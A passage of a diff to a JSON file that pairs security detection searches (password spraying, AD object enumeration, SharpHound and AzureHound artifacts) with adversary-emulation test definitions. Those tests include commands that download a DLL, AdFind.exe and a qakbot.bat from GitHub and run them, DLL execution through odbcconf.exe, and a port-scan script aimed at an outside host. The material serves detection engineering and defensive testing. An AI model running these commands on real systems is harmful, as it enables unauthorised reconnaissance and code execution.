adversary performing a Password Spraying attack against an Azure Active Directory tenant to obtain initial access or elevate privileges. Error Code 50126 represents an invalid password.\\\nThe detection calculates the standard deviation for source Ip and leverages the 3-sigma statistical rule to identify an unusual number of failed authentication attempts. To customize this analytic, users can try different combinations of the `bucket` span time and the calculation of the `upperBound` field. This logic can be used for real time security monitoring as well as threat hunting exercises.\\\nWhile looking for anomalies using statistical methods like the standard deviation can have benefits, we also recommend using threshold-based detections to complement coverage. A similar analytic following the threshold model is `Azure AD Multiple Users Failing To Authenticate From Ip`.", - "search": " `azuread` body.category=SignInLogs body.properties.status.errorCode=50126 body.properties.authenticationDetails{}.succeeded= false | rename body.properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as tried_accounts by _time, ipAddress | eventstats avg(unique_accounts) as ip_avg , stdev(unique_accounts) as ip_std by ipAddress | eval upperBound=(ip_avg+ip_std*3) | eval isOutlier=if(unique_accounts > 10 and unique_accounts >= upperBound, 1, 0) | where isOutlier = 1 | `azure_ad_unusual_number_of_failed_authentications_from_ip_filter`", + "search": " `azuread` category=SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as userPrincipalName by _time, ipAddress | eventstats avg(unique_accounts) as ip_avg, stdev(unique_accounts) as ip_std by ipAddress | eval upperBound=(ip_avg+ip_std*3) | eval isOutlier=if(unique_accounts > 10 and unique_accounts >= upperBound, 1,0) | where isOutlier = 1 | `azure_ad_unusual_number_of_failed_authentications_from_ip_filter`", "tags": { "name": "Azure AD Unusual Number of Failed Authentications From Ip", "analytic_story": [ @@ -357729,7 +360596,7 @@ "Weaponization", "Exploitation" ], - "message": "Possible Password Spraying attack against Azure AD from source ip $body.properties.ipAddress$", + "message": "Possible Password Spraying attack against Azure AD from source ip $ipAddress$", "mitre_attack_id": [ "T1586", "T1586.003", @@ -358449,7 +361316,7 @@ { "name": "Windows Multiple Users Failed To Authenticate From Process", "description": "The following analytic identifies a source process name failing to authenticate with 30 uniquer users. This behavior could represent an adversary performing a Password Spraying attack against an Active Directory environment to obtain initial access or elevate privileges. Active Directory environments can be very different depending on the organization. Users should test this detection and customize the arbitrary threshold when needed. Event 4625 generates on domain controllers, member servers, and workstations when an account fails to logon. Logon Type 2 describes an iteractive logon attempt.\\\nThis logic can be used for real time security monitoring as well as threat hunting exercises. This detection will trigger on the potenfially malicious host, perhaps controlled via a trojan or operated by an insider threat, from where a password spraying attack is being executed. This could be a domain controller as well as a member server or workstation.\\\nThe analytics returned fields allow analysts to investigate the event further by providing fields like source process name, source account and attempted user accounts.", - "search": " `wineventlog_security` EventCode=4625 Logon_Type=2 ProcessName!=\"-\" | bucket span=5m _time | stats dc(TargetUserName) AS unique_accounts values(TargetUserName) as tried_accounts by _time, ProcessName, SubjectUserName, Computer | where unique_accounts > 30 | `windows_multiple_users_failed_to_authenticate_from_process_filter`", + "search": " `wineventlog_security` EventCode=4625 Logon_Type=2 ProcessName!=\"-\" | bucket span=5m _time | stats dc(TargetUserName) AS unique_accounts values(TargetUserName) as tried_accounts by _time, ProcessName, SubjectUserName, Computer | rename Computer as dest | where unique_accounts > 30 | `windows_multiple_users_failed_to_authenticate_from_process_filter`", "tags": { "name": "Windows Multiple Users Failed To Authenticate From Process", "analytic_story": [ @@ -358464,7 +361331,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "Potential password spraying attack from $Computer$", + "message": "Potential password spraying attack from $dest$", "mitre_attack_id": [ "T1110.003", "T1110" @@ -358474,7 +361341,7 @@ ], "observable": [ { - "name": "ComputerName", + "name": "dest", "role": [ "Victim" ], @@ -358605,7 +361472,7 @@ { "name": "Windows Multiple Users Remotely Failed To Authenticate From Host", "description": "The following analytic identifies a source host failing to authenticate against a remote host with 30 unique users. This behavior could represent an adversary performing a Password Spraying attack against an Active Directory environment to obtain initial access or elevate privileges. Active Directory environments can be very different depending on the organization. Users should test this detection and customize the arbitrary threshold when needed. Event 4625 documents each and every failed attempt to logon to the local computer. This event generates on domain controllers, member servers, and workstations. Logon Type 3 describes an remote authentication attempt.\\\nThis logic can be used for real time security monitoring as well as threat hunting exercises. This detection will trigger on the host that is the target of the password spraying attack. This could be a domain controller as well as a member server or workstation.\\\nThe analytics returned fields allow analysts to investigate the event further by providing fields like source process name, source account and attempted user accounts.", - "search": " `wineventlog_security` EventCode=4625 Logon_Type=3 IpAddress!=\"-\" | bucket span=5m _time | stats dc(TargetUserName) AS unique_accounts values(TargetUserName) as tried_accounts by _time, IpAddress, Computer | where unique_accounts > 30 | `windows_multiple_users_remotely_failed_to_authenticate_from_host_filter` ", + "search": " `wineventlog_security` EventCode=4625 Logon_Type=3 IpAddress!=\"-\" | bucket span=5m _time | stats dc(TargetUserName) AS unique_accounts values(TargetUserName) as tried_accounts by _time, IpAddress, Computer | rename Computer as dest| where unique_accounts > 30 | `windows_multiple_users_remotely_failed_to_authenticate_from_host_filter` ", "tags": { "name": "Windows Multiple Users Remotely Failed To Authenticate From Host", "analytic_story": [ @@ -358619,7 +361486,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "Potential password spraying attack on $ComputerName$", + "message": "Potential password spraying attack on $dest$", "mitre_attack_id": [ "T1110.003", "T1110" @@ -358629,7 +361496,7 @@ ], "observable": [ { - "name": "ComputerName", + "name": "dest", "role": [ "Victim" ], @@ -364553,7 +367420,7 @@ { "name": "Registry Keys Used For Privilege Escalation", "description": "This search looks for modifications to registry keys that can be used to elevate privileges. The registry keys under \"Image File Execution Options\" are used to intercept calls to an executable and can be used to attach malicious binaries to benign system binaries.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path=\"*Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options*\") AND (Registry.registry_value_name=GlobalFlag OR Registry.registry_value_name=Debugger)) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `registry_keys_used_for_privilege_escalation_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path=\"*Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options*\") AND (Registry.registry_value_name=GlobalFlag OR Registry.registry_value_name=Debugger)) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `registry_keys_used_for_privilege_escalation_filter`", "tags": { "name": "Registry Keys Used For Privilege Escalation", "analytic_story": [ @@ -364798,7 +367665,7 @@ ], "command_list": [ "odbcconf.exe /S /A {REGSVR \"\\T1218.008\\src\\Win32\\T1218-2.dll\"}\n", - "cd \\T1218.008\\bin\\\nodbcconf.exe -f T1218.008.rsp\n" + "cd \"\\T1218.008\\bin\\\"\nodbcconf.exe -f \"T1218.008.rsp\"\n" ], "commands": [], "queries": [], @@ -364828,8 +367695,8 @@ "dependencies": [ { "description": "T1218-2.dll must exist on disk at specified location (#{dll_payload})\n", - "prereq_command": "if (Test-Path #{dll_payload}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll\" -OutFile \"#{dll_payload}\"\n" + "prereq_command": "if (Test-Path \"#{dll_payload}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{dll_payload}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll\" -OutFile \"#{dll_payload}\"\n" } ], "executor": { @@ -364860,12 +367727,12 @@ "dependencies": [ { "description": "T1218.008.rsp must exist on disk at specified location (#{rsp_file_path}#{rsp_file_name})\n", - "prereq_command": "if (Test-Path #{rsp_file_path}#{rsp_file_name}) {exit 0} else {exit 1}\n", + "prereq_command": "if (Test-Path \"#{rsp_file_path}#{rsp_file_name}\") {exit 0} else {exit 1}\n", "get_prereq_command": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/T1218.008.rsp\" -OutFile \"#{rsp_file_path}#{rsp_file_name}\"\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/o.dll\" -OutFile \"#{rsp_file_path}\\o.dll\"\n" } ], "executor": { - "command": "cd #{rsp_file_path}\nodbcconf.exe -f #{rsp_file_name}\n", + "command": "cd \"#{rsp_file_path}\"\nodbcconf.exe -f \"#{rsp_file_name}\"\n", "name": "command_prompt" } } @@ -366617,9 +369484,9 @@ "netsh advfirewall firewall show rule name=all\n", "if [ -x \"$(command -v arp)\" ]; then arp -a; else echo \"arp is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ifconfig)\" ]; then ifconfig; else echo \"ifconfig is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ip)\" ]; then ip addr; else echo \"ip is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v netstat)\" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo \"netstat is missing from the machine. skipping...\"; fi;\n", "ipconfig /all\nnet config workstation\nnet view /all /domain\nnltest /domain_trusts\n", - "$ports = Get-content \\T1016\\src\\top-128.txt\n$file = \"$env:USERPROFILE\\Desktop\\open-ports.txt\"\n$totalopen = 0\n$totalports = 0\nNew-Item $file -Force\nforeach ($port in $ports) {\n $test = new-object system.Net.Sockets.TcpClient\n $wait = $test.beginConnect(\"allports.exposed\", $port, $null, $null)\n $wait.asyncwaithandle.waitone(250, $false) | Out-Null\n $totalports++ | Out-Null\n if ($test.Connected) {\n $result = \"$port open\" \n Write-Host -ForegroundColor Green $result\n $result | Out-File -Encoding ASCII -append $file\n $totalopen++ | Out-Null\n }\n else {\n $result = \"$port closed\" \n Write-Host -ForegroundColor Red $result\n $totalclosed++ | Out-Null\n $result | Out-File -Encoding ASCII -append $file\n }\n}\n$results = \"There were a total of $totalopen open ports out of $totalports ports tested.\"\n$results | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n", - "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -f (objectcategory=subnet)\n", - "\\T1016\\src\\qakbot.bat\n", + "$ports = Get-content \"\\T1016\\src\\top-128.txt\"\n$file = \"$env:USERPROFILE\\Desktop\\open-ports.txt\"\n$totalopen = 0\n$totalports = 0\nNew-Item $file -Force\nforeach ($port in $ports) {\n $test = new-object system.Net.Sockets.TcpClient\n $wait = $test.beginConnect(\"allports.exposed\", $port, $null, $null)\n $wait.asyncwaithandle.waitone(250, $false) | Out-Null\n $totalports++ | Out-Null\n if ($test.Connected) {\n $result = \"$port open\" \n Write-Host -ForegroundColor Green $result\n $result | Out-File -Encoding ASCII -append $file\n $totalopen++ | Out-Null\n }\n else {\n $result = \"$port closed\" \n Write-Host -ForegroundColor Red $result\n $totalclosed++ | Out-Null\n $result | Out-File -Encoding ASCII -append $file\n }\n}\n$results = \"There were a total of $totalopen open ports out of $totalports ports tested.\"\n$results | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n", + "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -f (objectcategory=subnet)\n", + "\"\\T1016\\src\\qakbot.bat\"\n", "sudo defaults read /Library/Preferences/com.apple.alf\nsudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate\n", "nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%USERDNSDOMAIN%\n", "powershell/situational_awareness/host/dnsserver", @@ -366740,11 +369607,11 @@ { "description": "Test requires #{port_file} to exist\n", "prereq_command": "if (Test-Path \"#{port_file}\") {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"#{portfile_url}\" -OutFile \"#{port_file}\"\n" + "get_prereq_command": "New-Item -Type Directory (split-path \"#{port_file}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"#{portfile_url}\" -OutFile \"#{port_file}\"\n" } ], "executor": { - "command": "$ports = Get-content #{port_file}\n$file = \"#{output_file}\"\n$totalopen = 0\n$totalports = 0\nNew-Item $file -Force\nforeach ($port in $ports) {\n $test = new-object system.Net.Sockets.TcpClient\n $wait = $test.beginConnect(\"allports.exposed\", $port, $null, $null)\n $wait.asyncwaithandle.waitone(250, $false) | Out-Null\n $totalports++ | Out-Null\n if ($test.Connected) {\n $result = \"$port open\" \n Write-Host -ForegroundColor Green $result\n $result | Out-File -Encoding ASCII -append $file\n $totalopen++ | Out-Null\n }\n else {\n $result = \"$port closed\" \n Write-Host -ForegroundColor Red $result\n $totalclosed++ | Out-Null\n $result | Out-File -Encoding ASCII -append $file\n }\n}\n$results = \"There were a total of $totalopen open ports out of $totalports ports tested.\"\n$results | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n", + "command": "$ports = Get-content \"#{port_file}\"\n$file = \"#{output_file}\"\n$totalopen = 0\n$totalports = 0\nNew-Item $file -Force\nforeach ($port in $ports) {\n $test = new-object system.Net.Sockets.TcpClient\n $wait = $test.beginConnect(\"allports.exposed\", $port, $null, $null)\n $wait.asyncwaithandle.waitone(250, $false) | Out-Null\n $totalports++ | Out-Null\n if ($test.Connected) {\n $result = \"$port open\" \n Write-Host -ForegroundColor Green $result\n $result | Out-File -Encoding ASCII -append $file\n $totalopen++ | Out-Null\n }\n else {\n $result = \"$port closed\" \n Write-Host -ForegroundColor Red $result\n $totalclosed++ | Out-Null\n $result | Out-File -Encoding ASCII -append $file\n }\n}\n$results = \"There were a total of $totalopen open ports out of $totalports ports tested.\"\n$results | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n", "cleanup_command": "Remove-Item -ErrorAction ignore \"#{output_file}\"\n", "name": "powershell" } @@ -366760,12 +369627,12 @@ "dependencies": [ { "description": "AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe)\n", - "prereq_command": "if (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe) -ErrorAction ignore | Out-Null\nInvoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe\" -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\n" + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\"\n" } ], "executor": { - "command": "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -f (objectcategory=subnet)\n", + "command": "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -f (objectcategory=subnet)\n", "name": "command_prompt" } }, @@ -366787,12 +369654,12 @@ "dependencies": [ { "description": "File to copy must exist on disk at specified location (#{recon_commands})\n", - "prereq_command": "if (Test-Path #{recon_commands}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{recon_commands}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/qakbot.bat\" -OutFile \"#{recon_commands}\"\n" + "prereq_command": "if (Test-Path \"#{recon_commands}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{recon_commands}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/qakbot.bat\" -OutFile \"#{recon_commands}\"\n" } ], "executor": { - "command": "#{recon_commands}\n", + "command": "\"#{recon_commands}\"\n", "name": "command_prompt" } }, @@ -367190,7 +370057,7 @@ { "name": "Detect processes used for System Network Configuration Discovery", "description": "This search looks for fast execution of processes used for system network configuration discovery on the endpoint.", - "search": "| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where NOT Processes.user IN (\"\",\"unknown\") by Processes.dest Processes.process_name Processes.user _time | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | search `system_network_configuration_discovery_tools` | transaction dest connected=false maxpause=5m |where eventcount>=5 | table firstTime lastTime dest user process_name process parent_process eventcount | `detect_processes_used_for_system_network_configuration_discovery_filter`", + "search": "| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where NOT Processes.user IN (\"\",\"unknown\") by Processes.dest Processes.process_name Processes.parent_process_name Processes.user _time | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | search `system_network_configuration_discovery_tools` | transaction dest connected=false maxpause=5m |where eventcount>=5 | table firstTime lastTime dest user process_name process parent_process parent_process_name eventcount | `detect_processes_used_for_system_network_configuration_discovery_filter`", "tags": { "name": "Detect processes used for System Network Configuration Discovery", "analytic_story": [ @@ -367701,7 +370568,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An increase of Windows Post Exploitation behavior has been detected on $affected_systems$", + "message": "An increase of Windows Post Exploitation behavior has been detected on $risk_object$", "mitre_attack_id": [ "T1012", "T1049", @@ -367717,7 +370584,7 @@ ], "observable": [ { - "name": "affected_systems", + "name": "risk_object", "type": "Hostname", "role": [ "Victim" @@ -369469,7 +372336,8 @@ "analytic_story": [ "Data Destruction", "Hermetic Wiper", - "Windows Privilege Escalation" + "Windows Privilege Escalation", + "Flax Typhoon" ], "asset_type": "Endpoint", "cis20": [ @@ -371299,7 +374167,7 @@ { "name": "Detect AzureHound Command-Line Arguments", "description": "The following analytic identifies the common command-line argument used by AzureHound `Invoke-AzureHound`. Being the script is FOSS, function names may be modified, but these changes are dependent upon the operator. In most instances the defaults are used. This analytic works to identify the common command-line attributes used. It does not cover the entirety of every argument in order to avoid false positives.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN (\"*invoke-azurehound*\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_command_line_arguments_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN (\"*invoke-azurehound*\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_command_line_arguments_filter`", "tags": { "name": "Detect AzureHound Command-Line Arguments", "analytic_story": [ @@ -371471,7 +374339,7 @@ { "name": "Detect AzureHound File Modifications", "description": "The following analytic is similar to SharpHound file modifications, but this instance covers the use of Invoke-AzureHound. AzureHound is the SharpHound equivilent but for Azure. It's possible this may never be seen in an environment as most attackers may execute this tool remotely. Once execution is complete, a zip file with a similar name will drop `20210601090751-azurecollection.zip`. In addition to the zip, multiple .json files will be written to disk, which are in the zip.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*-azurecollection.zip\", \"*-azprivroleadminrights.json\", \"*-azglobaladminrights.json\", \"*-azcloudappadmins.json\", \"*-azapplicationadmins.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_file_modifications_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*-azurecollection.zip\", \"*-azprivroleadminrights.json\", \"*-azglobaladminrights.json\", \"*-azcloudappadmins.json\", \"*-azapplicationadmins.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.user | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_file_modifications_filter`", "tags": { "name": "Detect AzureHound File Modifications", "analytic_story": [ @@ -371788,7 +374656,7 @@ { "name": "Detect SharpHound File Modifications", "description": "SharpHound is used as a reconnaissance collector, ingestor, for BloodHound. SharpHound will query the domain controller and begin gathering all the data related to the domain and trusts. For output, it will drop a .zip file upon completion following a typical pattern that is often not changed. This analytic focuses on the default file name scheme. Note that this may be evaded with different parameters within SharpHound, but that depends on the operator. `-randomizefilenames` and `-encryptzip` are two examples. In addition, executing SharpHound via .exe or .ps1 without any command-line arguments will still perform activity and dump output to the default filename. Example default filename `20210601181553_BloodHound.zip`. SharpHound creates multiple temp files following the same pattern `20210601182121_computers.json`, `domains.json`, `gpos.json`, `ous.json` and `users.json`. Tuning may be required, or remove these json's entirely if it is too noisy. During traige, review parallel processes for further suspicious behavior. Typically, the process executing the `.ps1` ingestor will be PowerShell.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*bloodhound.zip\", \"*_computers.json\", \"*_gpos.json\", \"*_domains.json\", \"*_users.json\", \"*_groups.json\", \"*_ous.json\", \"*_containers.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_sharphound_file_modifications_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*bloodhound.zip\", \"*_computers.json\", \"*_gpos.json\", \"*_domains.json\", \"*_users.json\", \"*_groups.json\", \"*_ous.json\", \"*_containers.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.user| `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_sharphound_file_modifications_filter`", "tags": { "name": "Detect SharpHound File Modifications", "analytic_story": [ @@ -371824,7 +374692,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -373533,6 +376401,467 @@ ] } }, + { + "name": "Windows AD Abnormal Object Access Activity", + "description": "Windows Active Directory contains numerous objects. A statistically significant increase in access to these objects may be evidence of attacker enumeration of Active Directory.", + "search": "`wineventlog_security` EventCode=4662 | stats min(_time) AS firstTime, max(_time) AS lastTime, dc(ObjectName) AS ObjectName_count, values(ObjectType) AS ObjectType, latest(Computer) AS dest count BY SubjectUserName | eventstats avg(ObjectName_count) AS average stdev(ObjectName_count) AS standarddev | eval limit = round((average+(standarddev*3)),0), user = SubjectUserName | where ObjectName_count > limit | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `windows_ad_abnormal_object_access_activity_filter`", + "tags": { + "name": "Windows AD Abnormal Object Access Activity", + "analytic_story": [ + "Active Directory Discovery" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "The account $user$ accessed an abnormal amount ($ObjectName_count$) of [$ObjectType$] AD object(s) between $firstTime$ and $lastTime$.", + "mitre_attack_id": [ + "T1087", + "T1087.002" + ], + "nist": [ + "DE.AE" + ], + "observable": [ + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + } + ], + "risk_score": 25, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1087", + "mitre_attack_technique": "Account Discovery", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [] + }, + { + "mitre_attack_id": "T1087.002", + "mitre_attack_technique": "Domain Account", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [ + "BRONZE BUTLER", + "Chimera", + "Dragonfly", + "FIN6", + "Fox Kitten", + "Ke3chang", + "LAPSUS$", + "MuddyWater", + "OilRig", + "Poseidon Group", + "Sandworm Team", + "Turla", + "Wizard Spider", + "menuPass" + ] + } + ] + } + }, + { + "name": "Windows AD Privileged Object Access Activity", + "description": "Windows Active Directory contains numerous objects that grant elevated access to the domain they reside in. These objects should be rarely accessed by normal users or processes. Access attempts to one or more of these objects may be evidence of attacker enumeration of Active Directory.", + "search": "`wineventlog_security` EventCode=4662 ObjectName IN ( \"CN=Account Operators,*\", \"CN=Administrators,*\", \"CN=Backup Operators,*\", \"CN=Cert Publishers,*\", \"CN=Certificate Service DCOM Access,*\", \"CN=Domain Admins,*\", \"CN=Domain Controllers,*\", \"CN=Enterprise Admins,*\", \"CN=Enterprise Read-only Domain Controllers,*\", \"CN=Group Policy Creator Owners,*\", \"CN=Incoming Forest Trust Builders,*\", \"CN=Microsoft Exchange Servers,*\", \"CN=Network Configuration Operators,*\", \"CN=Power Users,*\", \"CN=Print Operators,*\", \"CN=Read-only Domain Controllers,*\", \"CN=Replicators,*\", \"CN=Schema Admins,*\", \"CN=Server Operators,*\", \"CN=Exchange Trusted Subsystem,*\", \"CN=Exchange Windows Permission,*\", \"CN=Organization Management,*\") | rex field=ObjectName \"CN\\=(?[^,]+)\" | stats values(Computer) as dest, values(object_name) as object_name, dc(ObjectName) as object_count, min(_time) as firstTime, max(_time) as lastTime, count by SubjectUserName | rename SubjectUserName as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_ad_privileged_object_access_activity_filter`", + "tags": { + "name": "Windows AD Privileged Object Access Activity", + "analytic_story": [ + "Active Directory Discovery" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "The account $user$ accessed $object_count$ privileged AD object(s).", + "mitre_attack_id": [ + "T1087", + "T1087.002" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "object_name", + "type": "Other", + "role": [ + "Attacker" + ] + } + ], + "risk_score": 40, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1087", + "mitre_attack_technique": "Account Discovery", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [] + }, + { + "mitre_attack_id": "T1087.002", + "mitre_attack_technique": "Domain Account", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [ + "BRONZE BUTLER", + "Chimera", + "Dragonfly", + "FIN6", + "Fox Kitten", + "Ke3chang", + "LAPSUS$", + "MuddyWater", + "OilRig", + "Poseidon Group", + "Sandworm Team", + "Turla", + "Wizard Spider", + "menuPass" + ] + } + ] + } + }, + { + "name": "Windows Find Domain Organizational Units with GetDomainOU", + "description": "This analytic leverages PowerShell Script Block Logging (EventCode=4104) to detect the execution of the `Get-DomainOU` commandlet. `Get-DomainOU` is a component of PowerView, a PowerShell toolkit designed for Windows domain enumeration. Identifying the use of `Get-DomainOU` is crucial as adversaries and Red Teams might employ it to gain insights into organizational units within Active Directory, potentially aiding in lateral movement or privilege escalation strategies.", + "search": "`powershell` EventCode=4104 ScriptBlockText = \"*Get-DomainOU*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_find_domain_organizational_units_with_getdomainou_filter`", + "tags": { + "name": "Windows Find Domain Organizational Units with GetDomainOU", + "analytic_story": [ + "Active Directory Discovery" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "Suspicious PowerShell Get-DomainOU was identified on endpoint $dest$ by user $user$.", + "mitre_attack_id": [ + "T1087", + "T1087.002" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + } + ], + "risk_score": 25, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1087", + "mitre_attack_technique": "Account Discovery", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [] + }, + { + "mitre_attack_id": "T1087.002", + "mitre_attack_technique": "Domain Account", + "mitre_attack_tactics": [ + "Discovery" + ], + "mitre_attack_groups": [ + "BRONZE BUTLER", + "Chimera", + "Dragonfly", + "FIN6", + "Fox Kitten", + "Ke3chang", + "LAPSUS$", + "MuddyWater", + "OilRig", + "Poseidon 